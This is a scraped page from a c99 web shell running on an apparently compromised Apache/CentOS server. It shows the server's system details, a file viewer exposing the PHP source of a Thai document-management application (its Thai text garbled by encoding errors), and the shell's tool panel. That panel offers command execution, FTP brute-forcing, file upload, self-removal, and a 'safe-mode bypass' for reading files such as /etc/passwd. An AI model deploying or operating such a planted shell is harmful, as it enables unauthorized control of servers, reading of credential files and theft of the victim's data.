!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/person/admin/   drwxr-xr-x
Free 52.33 GB of 127.8 GB (40.95%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     receiveDoc2_b.php (16.84 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
SearchMaxDocGroup(); if($DLCID && $one_position!="1"){ include_once "selectposition.php"; ?>
">˹ѧÊ×Íà¢éÒ
" size="3"> ˹ѧÊ×Íà¢éÒ    

deptId;?>
"> SearchByKey($DLCID); $oDlc->GetRecord(); $oDlp1->SearchByKey($oDlc->DlpID); $oDlp1->GetRecord(); if($oDlp1->DlpPID!="0"){ $DlcPS2=$DLCID; }else{ $DlcPS2=$oDlc2->SearchDlc2($oDlc->DlcSeq,$oDlp1->DlpPID,$oDlc->deptId); } $oDoc->SearchByDlcIDDocGroupPSDlcID2DsID0($DLCID,$MaxDocGroup,$DlcPS2); $i=0; while($oDoc->GetRecord()){ $oRs->SearchByDocGroupDocIDStatus0($MaxDocGroup,$oDoc->DocID); if($oRs->GetRecord()=="1"){ if(($i%2) == 0) echo ""; else echo ""; ?> DslID=="0"){ $rapid="../picture/rapid0.jpg"; $rapidname=$oDsl2->SearchName(0); }else if($oDoc->DslID=="1"){ $rapid="../picture/rapid1.jpg"; $rapidname=$oDsl2->SearchName(1); }else if($oDoc->DslID=="2"){ $rapid="../picture/rapid2.jpg"; $rapidname=$oDsl2->SearchName(2); }else if($oDoc->DslID=="3"){ $rapid="../picture/rapid3.jpg"; $rapidname=$oDsl2->SearchName(3); }else{ $rapid="../picture/blank.gif"; $rapidname=""; }?> DclID=="0"){ $secret="../picture/secret0.jpg"; $secretname=$oDcl2->SearchName(0); }else if($oDoc->DclID=="1"){ $secret="../picture/secret1.jpg"; $secretname=$oDcl2->SearchName(1); }else if($oDoc->DclID=="2"){ $secret="../picture/secret2.jpg"; $secretname=$oDcl2->SearchName(2); }else if($oDoc->DclID=="3"){ $secret="../picture/secret3.jpg"; $secretname=$oDcl2->SearchName(3); }else if($oDoc->DclID=="4"){ $secret="../picture/secret4.jpg"; $secretname=$oDcl2->SearchName(4); }else{ $secret="../picture/blank.gif"; $secretname=""; }?>
" size="2">·Õè " size="2">¨Ò¡/·ÕèÁÒ (µé¹àÃ×èͧ) " size="2">àÃ×èͧ " size="2">Çѹ·Õèä´éÃѺ˹ѧÊ×Í
 DocNo; ?> DocPID=="0"){ $oDlc2->SearchByKey($oDoc->DlcID); $oDlc2->GetRecord(); $oDlp->SearchByKey($oDlc2->DlpID); $oDlp->GetRecord(); $oDP->SearchByKey($oDlc2->deptId); $oDP->GetRecord(); echo " ".$oDP->deptName."
"; echo " (".$oDlp->DlpName.")"; }else{ $oRs2->SearchByKey($oRs->DrsFromDrsID); $oRs2->GetRecord(); $oDoc2->SearchByKey($oRs2->DocID); $oDoc2->GetRecord(); $oDlc2->SearchByKey($oDoc2->DlcID); $oDlc2->GetRecord(); $oDlp->SearchByKey($oDlc2->DlpID); $oDlp->GetRecord(); $oDP->SearchByKey($oDlc2->deptId); $oDP->GetRecord(); echo " ".$oDP->deptName."
"; echo " (".$oDlp->DlpName.")"; } ?>
 ".$oDoc->CertificatePs; }else{ echo $oDoc->DocSubject; } ?> DrsReceiveDate ); echo abbreDate2($DocD,'/')."
".a2th($DocT); ?>
<? echo $rapidname; ?> <? echo $secretname; ?>
" size="2">** äÁèÁÕÃÒ¡ÒÃ˹ѧÊ×Íà¢éÒ **
 

  " size="2"> style="display:none; cursor:pointer" style="display:''; cursor:pointer" onclick="up_downList('')">áÊ´§  style="display:''; cursor:pointer" style="display:none; cursor:pointer" alt="«è͹" onclick="up_downList('')">«è͹  style="display:''; border-collapse:collapse" style="display:none; border-collapse:collapse" background=""> DlpID=="1"){ $oDoc4->SearchByDocGroupDsID1($MaxDocGroup,$RsID,$DtID); }else{ $oDoc4->SearchByDlcIDDocGroupDsID1DlcPS2($DLCID,$MaxDocGroup,$DlcPS2,$RsID,$DtID); } }else{ $oDoc4->SearchByDlcIDDocGroupDsID1DlcPS2($DLCID,$MaxDocGroup,$DlcPS2,$RsID,$DtID); } while($oDoc4->GetRecord()){ $numrow++; } $numRow = $numrow; //echo "===========".$numRow; $page_size = 10; $total_page = (int)($numRow/$page_size); if(($numRow%$page_size) != 0) $total_page++; if(isset($page_id)) $start = $page_size*($page_id-1); else { $page_id = 1; $start = 0; } //------------------------------- if($RsID=="5" || $RsID=="2"){ if($oDlp->DlpID=="1"){ $oDoc3->SearchByDocGroupDsID1Limit($MaxDocGroup, $start, $page_size,$RsID,$DtID); }else{ $oDoc3->SearchByDlcIDDocGroupDsID1DlcPS2Limit($DLCID,$MaxDocGroup,$DlcPS2, $start, $page_size,$RsID,$DtID); } }else{ $oDoc3->SearchByDlcIDDocGroupDsID1DlcPS2Limit($DLCID,$MaxDocGroup,$DlcPS2, $start, $page_size,$RsID,$DtID); } $z=0; while($oDoc3->GetRecord()){ $oDoc5->SearchByKey($oDoc3->DocID); $oDoc5->GetRecord(); $oRs4->SearchByDocIDStatus1($oDoc5->DocID); $oRs4->GetRecord(); if(($z%2) == 0) echo ""; else echo ""; ?>
" size="2">·Õè " size="2">¨Ò¡/·ÕèÁÒ (µé¹àÃ×èͧ) " size="2">àÃ×èͧ " size="2">Çѹ·Õèä´éÃѺ˹ѧÊ×Í " size="2">Çѹ·ÕèàʹÍ˹ѧÊ×Í  
 DocNo; ?> DocDate =="0000-00-00"){ echo ""; }else{ echo abbreDate(splitDateDb2($oDoc5->DocDate ,'/')); }?>   DocSubject; ?> SearchByKey($oRs4->DrsFromDrsID); $oRs6->GetRecord(); $oDlc5->SearchByKey($oRs6->DrsDlcIDCreate); $oDlc5->GetRecord(); $oDP5->SearchByKey($oDlc5->deptId); $oDP5->GetRecord(); echo " (¨Ò¡$oDP5->deptName)"; } ?> DlpPID!="0"){ if($DLCID==$oDoc5->DlcID){ echo " [ÃÑ¡ÉÒ¡ÒÃ]"; }} ?> DlpPID=="0"){ if($DlcPS2==$oDoc5->DlcID){ echo " [ÃÑ¡ÉÒ¡ÒÃ]"; }} ?> endDoc=="Y"){ echo "[ÂصÔ˹ѧÊ×Í]"; } ?> DlcID!=$DLCID) && ($oDoc5->DlcID!=$DlcPS2)){ $oDlc4->SearchByKey($oDoc5->DlcID); $oDlc4->GetRecord(); $oDP4->SearchByKey($oDlc4->deptId); $oDP4->GetRecord(); echo " (¨Ò¡$oDP4->deptName)"; } ?> DocDateCreate); echo abbreDate2($DocD,'/')."
".a2th($DocT); ?>
SearchByDocIDStatus1($oDoc5->DocID); if($oRs3->GetRecord()==1){ if($oRs3->DrsByPass=="Y"){ echo "Ê觼èÒ¹"; }else{ $oRs5->SearchByDrsFromDrsID($oRs3->DrsID); if($oRs5->GetRecord()=="1"){ list($DocD,$DocT) = split(' ',$oRs5->DrsReceiveDate); echo abbreDate2($DocD,'/')."
".a2th($DocT); }else{ echo " "; } } } ?>
DrsflagRead=="N"){ ?> µéͧ¡ÒÃáÊ´§Ë¹Ñ§Ê×Í·ÕèÍèÒ¹áÅéÇ
" size="2">** äÁèÁÕ **
˹éÒ-> ";}?>   

" size="2"> ËÁÒÂà赯 :   " size="2">¤ÅÔ¡·ÕèàÃ×èͧ˹ѧÊ×Íà¾×èÍŧÃѺ˹ѧÊ×Í
  " size="2">ªÑ鹤ÇÒÁàÃçÇ  RSDocSpeedLevel(); $r=0; while($oDsl->GetRecord()){ if($oDsl->DslID=="0"){ $picsp="../picture/rapid0.jpg"; }else if($oDsl->DslID=="1"){ $picsp="../picture/rapid1.jpg"; }else if($oDsl->DslID=="2"){ $picsp="../picture/rapid2.jpg"; }else if($oDsl->DslID=="3"){ $picsp="../picture/rapid3.jpg"; } else if($oDsl->DslID=="4"){ $picsp="../picture/rapid4.jpg"; } ?> DslName."  "; $r++; }?>
  " size="2">ªÑ鹤ÇÒÁÅѺ  RSDocSecretLevel(); $r=0; while($oDcl->GetRecord()){ if($oDcl->DclID=="0"){ $piccl="../picture/secret0.jpg"; }else if($oDcl->DclID=="1"){ $piccl="../picture/secret1.jpg"; }else if($oDcl->DclID=="2"){ $piccl="../picture/secret2.jpg"; }else if($oDcl->DclID=="3"){ $piccl="../picture/secret3.jpg"; } else if($oDcl->DclID=="4"){ $piccl="../picture/secret4.jpg"; } ?> DclName."  "; $r++; }?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.005 ]--